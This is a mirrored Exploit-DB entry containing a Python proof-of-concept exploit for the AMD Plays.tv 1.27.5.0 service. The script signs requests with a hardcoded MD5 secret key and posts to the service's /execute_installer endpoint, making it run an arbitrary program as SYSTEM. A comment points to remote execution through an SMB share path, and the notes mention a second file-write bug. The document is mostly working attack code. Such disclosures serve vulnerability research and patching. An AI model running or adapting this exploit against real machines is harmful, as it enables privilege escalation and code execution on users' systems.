AMD Plays.tv 1.27.5.0 – ‘plays_service.exe’ Arbitrary File Execution

  • 作者: Securifera
    日期: 2018-04-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44476/
  • ########################################################################
#http://support.amd.com/en-us/download?cmpid=CCCOffline - 
#Click "Automatically Detect - Download Now"
#Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
#OR
#
#https://plays.tv/download
#
#Target OS: Windows( Any )
#Privilege: SYSTEM
#Type:Arbitrary File Execution
#
#Notes: Second minor bug allows for arbitrary file write of 
# uncontrolled data using the /extract_files path.
#
########################################################################

#!/usr/bin/python3
import urllib.request
import json
import hashlib

def check_svc( path, data ):

#Setup request
request = urllib.request.Request(addr)

#add post data
try:
resp = urllib.request.urlopen(request, "data".encode("utf-8"))
return "[-] Not Raptr, Plays TV service"
except urllib.error.HTTPError as err:
error_message = err.read().decode("utf-8")
if error_message == 'Security failed - Missing hash or message[data]':
return "[+] Raptr, Plays TV service"

def post_req( path, data ):

secret_key = 'a%qs0t33QgiE6ut^0I&Y'

#Setup request
request = urllib.request.Request(addr)
json_data = json.dumps(data)

m = hashlib.md5()
hash_data = path + json_data + secret_key
m.update(hash_data.encode('utf8'))
hash_str = m.hexdigest()

#add post data
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
resp = urllib.request.urlopen(request, p_data)
return resp.read()

#Target IP address
ip = '127.0.0.1'

##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] 
##############################################################
port = 50452

##############################################################
# The service calls CreateProcess with the following format: 
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
"installer": cmd,
"appdata": cmd
}

#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path

#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)

#Exploit service
ret = post_req(path, data)
print(ret)
    PowerShell